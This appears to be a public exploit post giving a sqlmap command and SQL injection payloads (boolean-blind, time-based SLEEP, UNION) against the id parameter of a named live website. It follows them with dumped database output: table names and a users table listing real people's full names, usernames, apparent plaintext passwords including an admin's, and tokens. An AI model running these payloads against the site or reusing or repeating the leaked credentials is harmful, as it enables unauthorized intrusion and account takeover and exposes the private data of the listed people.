# Exploit Title: Code For Share | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://c4s.khacdatdo.dev/edit.php?id=33" --dbs --batch --------------------------------------------------------------------------------------------------- .dev Developer / Software Code For Share https://c4s.khacdatdo.dev/edit.php?id=33 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=136 AND 3415=3415 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=136 AND (SELECT 2301 FROM (SELECT(SLEEP(5)))MWrG) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id=136 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x514a7842596c6b48737771584e474d756864455053446a54765843454d6b6b6441654351776e6965,0x717a6b6a71),NULL,NULL-- - --- database management system users [1]: [+] 'i4b3whw47kx5zgbc'@'%' the back-end DBMS is MySQL web application technology: PHP, Apache back-end DBMS: MySQL >= 5.0.12 available databases [2]: [+] an1g279qniutsqwr [+] information_schema Database: an1g279qniutsqwr [8 tables] +---------------+ | discord-bot | | chatbot | | thcs2_code | | thcs2_log | | thcs2_report | | thcs2_txtcode | | thcs2_users | | thcs2_view | +---------------+ Database: an1g279qniutsqwr Table: thcs2_users [8 entries] +----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+ | id | email | token | birthday | fullname | password | typeuser | username | +----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+ | uFzEQ5U90fN30mODLIDeu3vF2IGnd933d6d084280054df6349e05ac15e2a3c | 1 | admin | Đỗ Khắc Đạt | Datdongket@123 | admin | <blank> | <blank> | | member | 2 | <blank> | Vũ Đình Công | congvu | congvu | <blank> | <blank> | | member | 3 | <blank> | Phạm Anh Hiếu | hieupham | hieupham | <blank> | <blank> | | L67MNsJ22s2t3Deu0vXnU1NnwZgOdCaa661568aac0790dcab888d9cba85ad4 | 4 | diepnguyen | Nguyễn Thế Điệp | diepnguyen | member | <blank> | <blank> | | 8L50OlZJjjWA2gzQlwsCnJmhgGnHmk8691fd3a1e02d55dd75dc1d4a0a44b32 | 5 | haunguyen | Nguyễn Văn Hậu | haunguyen | member | <blank> | <blank> | | member | 6 | <blank> | Tô Tiến Dũng | dungto | dungto | <blank> | <blank> | | member | 7 | <blank> | Nguyễn Huy Hoàng | hoangnguyen | hoangnguyen | <blank> | <blank> | | member | 8 | <blank> | Bùi Quang Huy | huybui | huybui | <blank> | <blank> | +----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+